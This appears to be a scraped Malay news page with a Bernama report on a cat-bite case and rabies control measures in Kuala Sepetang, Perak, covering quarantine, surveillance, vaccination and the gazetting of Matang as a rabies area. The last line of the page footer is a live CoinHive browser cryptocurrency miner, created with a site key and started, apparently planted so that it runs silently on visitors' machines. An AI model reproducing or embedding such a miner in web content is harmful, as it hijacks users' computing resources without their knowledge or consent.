© Copyright 2017, All Rights Reserved
Home / Semasa / Satu kes baharu gigitan kucing dilapor di Kuala Sepetang

Satu kes baharu gigitan kucing dilapor di Kuala Sepetang


IPOH: Satu kes baharu gigitan kucing yang bertuan dilaporkan di Kampung Mentari, Kuala Sepetang, di Taiping, semalam.

Pengarah Jabatan Perkhidmatan Veterinar (DVS) Perak Dr Fuziah Muhayat berkata mangsa gigitan, seorang wanita berumur 41 tahun yang juga pemilik kucing itu, telah mendapat rawatan di Pusat Kesihatan Kuala Sepetang.

“Pemeriksaan klinikal telah dibuat dan mendapati tiada petanda klinikal pada kucing tersebut.

Tindakan kuarantin dan pemerhatian klinikal akan dilakukan ke atas kucing itu sehingga tempoh 14 hari,” katanya dalam satu kenyataan di sini hari ini.

Pada 4 Julai lepas, dua kanak-kanak perempuan masing-masing berumur 11 dan 12 tahun di Kuala Sepetang digigit anjing peliharaan mereka sebelum haiwan itu mati lapan hari kemudian.

Menurut Fuziah, sebanyak 59 buah rumah di dalam satu kilometer (km) radius dari lokasi kes rabies sebelum ini telah dibuat bancian dan survelan aktif di daerah Larut Matang dan Selama.

“Didapati bilangan anjing bertuan adalah seekor manakala anjing tidak bertuan (anjing liar) sebanyak lima ekor. Tiada sebarang petanda klinikal dikesan pada semua haiwan terbabit,” katanya.

Fuziah berkata program pemvaksinan juga telah dijalankan dalam 1 km radius bermula pada hari ini dan sebanyak 1,000 dos vaksin rabies dihantar ke DVS Perak.         

“Program kempen kesedaran dalam 1 km radius juga telah dijalankan dengan memberi penerangan dari rumah ke rumah kepada 59 orang pemilik haiwan,” katanya sambil menambah 48 kakitangan jabatan itu terlibat dalam program hari ini.

Sementara itu,  dua kanak-kanak perempuan yang digigit anjing peliharaan di Kuala Sepetang telah mendapat vaksin rabies dos pertama dari pihak hospital berdekatan dan dibenarkan pulang ke rumah.

Menteri Besar Perak Datuk Seri Dr Zambry Abd Kadir dalam satu program hari ini berkata Kerajaan Perak mewartakan mukim Matang dalam daerah Larut Matang dan Selama sebagai kawasan penyakit anjing gila atau rabies, berkuat kuasa hari ini.

Katanya, pewartaan itu dikeluarkan di bawah Perintah Kawasan Jangkitan Penyakit Anjing Gila.         

–BERNAMA 


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

Para KL2017: Tewas tetapi Amir tidak cemburu | Olahraga

KUALA LUMPUR: Kehadiran permata baharu dalam acara lompat jauh lelaki T38 (cerebral ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();